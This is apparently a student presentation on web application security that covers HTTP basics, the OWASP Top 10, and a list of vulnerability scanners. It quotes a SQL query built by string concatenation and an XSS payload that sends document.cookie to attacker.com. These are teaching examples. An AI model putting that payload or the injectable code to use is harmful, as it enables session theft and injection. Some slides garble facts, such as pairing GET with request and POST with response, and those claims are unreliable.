View
24
Download
2
Category
Tags:
Preview:
Citation preview
Web Application Security
CS200 PROJECT PRESENTATION
INSTRUCTOR: DR. FERDOUS AHMED
REFERENCE: HTTP://WWW.OWASP.ORG
1
Presented by:
Md Syed Ahamad
Topics
Introduction
Issues and solutions – OWASP
Problems analysis
Vulnerabilities
preventions
Common Mistakes
Ways of approach
Vulnerabilities Scanner
3
Background
Many sensitive task are done through web
Online banking, online shopping etc.
Database access
System administration
Web applications and web users are targets of many attacks
Network based attacks
Injection
Broken Authentication and Session Managements
Cross site scripting
And many more…
4
Introduction
Web Application
Web Browser communicates with Web Server to retrieve web pages.
Web Application Security
Deals specially with security of Web Applications
Client – Server structure
5
Fundamentals of Web Apps.
Uniform Resource Locator(URL)
uniquely identify the location of a web page
tells about type of communication, OS type, the type of web app.
code, and more.
URL manipulation – a web application attack
6
Fundamentals of Web Apps.
HTTP
designates how the web browser and the web server communicate
with each other.
Stateless protocol – a request is sent and a response is received after a
connection is established.
Post Data
Another portion of an HTTP request
used when larger amounts of data need to be sent from the browser to
the web server
Cookies
Small amount of data supplied by web server and stored by web
browser
7
HTTP Request and Response
Request – get
Response – post
8
• Attack
• HTTP smuggling
• Cache Poisioning
Fundamentals of Web Apps.
HTTPS
HTTP wrapped with
Secure Sockets Layer
(SSL) encryption.
Data sent is encrypted.
Protects data in transit.
9
Fundamentals of Web Apps. 10
Firewall
prevent unauthorized connections to protected network devices.
Protect from network based attacks.
Fail to protect web based attacks
Issues – Web based attacks
OWASP
An online Community dedicated to web application Security.
It includes corporations, educational organizations, and individuals from
around the world.
OWASP Top 10 – most important to discuss.
to raise awareness about app. security by identifying some of the critical
risks organisations.
Analyse clearly and solve the problems.
11
Applications Security Risks
Attackers use different path to harm you.
These factors determine the overall risk.
12
OWASP Top 10
A1 – Injection
A2 – Broken Authentication and Session Managements
A3 – Cross Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function level Access Control
A8 – Cross Site Request Forgery (CSRF)
A9 – Using Known Vulnerable Components
A10 – Invalidated Redirects and forwards
14
A1 - Injection
Injection flaws – Sql, OS, LDAP etc.
Data is sent to server as command and query.
most prevalent and dangerous attacks on the Internet.
15
A1 - Injection
Vulnerabilities
Use of interpreter that clearly separates untrusted data, command or
query
Avoid dynamic query, use stored procedures, prepared statements.
Use of Code checking tools, penetration testers.
Preventions
Use of safe API.
Escape special characters.
No special characters – Positive or “white list” input validation.
16
A1 – Injection
Example
Scenario #1
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
Select data from table where emailinput=‘email_input’;
17
A2 – Broken Authentication and
Session Management
App. Related to session and authentication are not implemented correctly.
Attackers try to compromise passwords, keys, or session tokens or user IDs.
18
A2 – Broken Authentication and
Session Management Vulnerabilities
User IDs are not protected when stored using Hashing and encryption.
guessed or overwritten through weak ac. Management.
Session ID as exposed, don’t time out, don’t rotate after login etc.
Preventions
OWASP’s Application Security Verification Standard (ASVS).
simple interface for developers.
Strong effort to avoid XSS flaws.
19
A2 – Broken Authentication and
Session Management
Example
Scenario #1: Airline reservations application supports URL rewriting,
putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
20
A3 – Cross Site Scripting
Malicious code are injected to website.
Stored, reflected and DOM based.
21
A3 – Cross Site Scripting
Example
The application uses untrusted data in the construction of the following
HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in his browser to:
'><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
23
Way of approach
SSL
Website Vulnerability Scanner
Types
Network scanner
Port scanner
Web app. Security scanner
24
Vulnerability Scanner
Acunetix Web Vulnerability Scanner
Cenzic Hailstorm
GFI LANguard Network Security Scanner
Teneble Nessus 3
Nmap
QualysGuard
Retina Network Security Scanner
SAINT Network Vulnerability Scanner
25
Recommended